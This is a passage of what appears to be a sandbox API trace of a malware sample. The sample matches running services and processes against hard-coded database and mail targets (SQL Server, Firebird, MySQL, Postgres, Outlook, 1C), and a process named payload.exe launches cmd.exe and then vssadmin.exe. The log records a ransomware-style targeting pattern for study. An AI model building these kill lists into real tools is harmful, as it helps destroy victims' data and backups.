(lpString1="mssqlserver", lpString2="UxSms") returned -1 [0054.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0054.767] lstrlenW (lpString="VSS") returned 3 [0054.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0054.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0054.767] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0054.767] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0054.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0054.767] lstrlenW (lpString="WdiServiceHost") returned 14 [0054.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.767] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0054.767] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0054.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0054.767] lstrlenW (lpString="WdiSystemHost") returned 13 [0054.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.767] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0054.767] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0054.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0054.767] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0054.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.767] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0054.767] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0054.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0054.767] lstrlenW (lpString="Winmgmt") returned 7 [0054.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0054.767] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0054.767] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0054.767] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0054.767] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0054.768] lstrlenW (lpString="WPDBusEnum") returned 10 [0054.768] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.768] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.768] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0054.768] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0054.768] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0054.768] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0054.768] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x220 [0054.770] Process32FirstW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.771] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.771] lstrlenW (lpString="System") returned 6 [0054.771] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0054.771] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0054.771] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0054.771] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0054.771] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0054.771] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0054.772] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0054.772] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.772] lstrlenW (lpString="smss.exe") returned 8 [0054.772] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0054.772] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0054.772] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0054.772] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0054.772] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0054.772] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0054.772] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0054.772] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.773] lstrlenW (lpString="csrss.exe") returned 9 [0054.773] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0054.773] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0054.773] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0054.773] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0054.773] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0054.773] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0054.773] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0054.773] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.774] lstrlenW (lpString="wininit.exe") returned 11 [0054.774] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0054.774] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0054.774] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0054.774] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.775] lstrlenW (lpString="csrss.exe") returned 9 [0054.775] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.776] lstrlenW (lpString="winlogon.exe") returned 12 [0054.776] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.776] lstrlenW (lpString="services.exe") returned 12 [0054.776] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.777] lstrlenW (lpString="lsass.exe") returned 9 [0054.777] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0054.778] lstrlenW (lpString="lsm.exe") returned 7 [0054.778] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.778] lstrlenW (lpString="svchost.exe") returned 11 [0054.779] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.779] lstrlenW (lpString="svchost.exe") returned 11 [0054.779] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.780] lstrlenW (lpString="svchost.exe") returned 11 [0054.780] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.781] lstrlenW (lpString="svchost.exe") returned 11 [0054.781] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.781] lstrlenW (lpString="svchost.exe") returned 11 [0054.781] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.782] lstrlenW (lpString="audiodg.exe") returned 11 [0054.782] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.783] lstrlenW (lpString="svchost.exe") returned 11 [0054.783] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.783] lstrlenW (lpString="svchost.exe") returned 11 [0054.784] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.784] lstrlenW (lpString="dwm.exe") returned 7 [0054.784] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.785] lstrlenW (lpString="explorer.exe") returned 12 [0054.785] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.786] lstrlenW (lpString="spoolsv.exe") returned 11 [0054.786] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.787] lstrlenW (lpString="taskhost.exe") returned 12 [0054.787] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.787] lstrlenW (lpString="svchost.exe") returned 11 [0054.787] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0054.788] lstrlenW (lpString="taskeng.exe") returned 11 [0054.788] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.789] lstrlenW (lpString="taskhost.exe") returned 12 [0054.789] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0054.789] lstrlenW (lpString="carried trinity.exe") returned 19 [0054.789] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0054.790] lstrlenW (lpString="heaven.exe") returned 10 [0054.790] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0054.791] lstrlenW (lpString="dell.exe") returned 8 [0054.791] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0054.791] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0054.792] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0054.792] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0054.792] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0054.793] lstrlenW (lpString="til ear equal.exe") returned 17 [0054.793] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0054.794] lstrlenW (lpString="itunes-bring.exe") returned 16 [0054.794] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0054.794] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0054.794] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0054.795] lstrlenW (lpString="philadelphia.exe") returned 16 [0054.795] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0054.796] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0054.796] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0054.796] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0054.797] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0054.797] lstrlenW (lpString="fraud stuck.exe") returned 15 [0054.797] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0054.798] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0054.798] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0054.799] lstrlenW (lpString="attended.exe") returned 12 [0054.799] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0054.799] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0054.799] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0054.800] lstrlenW (lpString="pan physician.exe") returned 17 [0054.800] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0054.801] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0054.801] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0054.802] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0054.802] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0055.063] lstrlenW (lpString="over-celebrity.exe") returned 18 [0055.063] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0055.064] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0055.064] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0055.065] lstrlenW (lpString="payload.exe") returned 11 [0055.065] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0055.065] lstrlenW (lpString="cmd.exe") returned 7 [0055.065] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0055.066] lstrlenW (lpString="conhost.exe") returned 11 [0055.066] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0055.067] lstrlenW (lpString="vssadmin.exe") returned 12 [0055.067] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0055.068] lstrlenW (lpString="VSSVC.exe") returned 9 [0055.068] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.069] lstrlenW (lpString="svchost.exe") returned 11 [0055.069] Process32NextW (in: hSnapshot=0x220, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0055.069] CloseHandle (hObject=0x220) returned 1 [0055.069] Sleep (dwMilliseconds=0x1f4) [0055.783] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x625e10 [0055.784] EnumServicesStatusExW (in: hSCManager=0x625e10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0055.786] GetLastError () returned 0xea [0055.786] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0055.786] EnumServicesStatusExW (in: hSCManager=0x625e10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0055.787] CloseServiceHandle (hSCObject=0x625e10) returned 1 [0055.787] lstrlenW (lpString="Appinfo") returned 7 [0055.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0055.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0055.787] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0055.787] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0055.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0055.787] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0055.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.787] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0055.788] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0055.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0055.788] lstrlenW (lpString="AudioSrv") returned 8 [0055.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 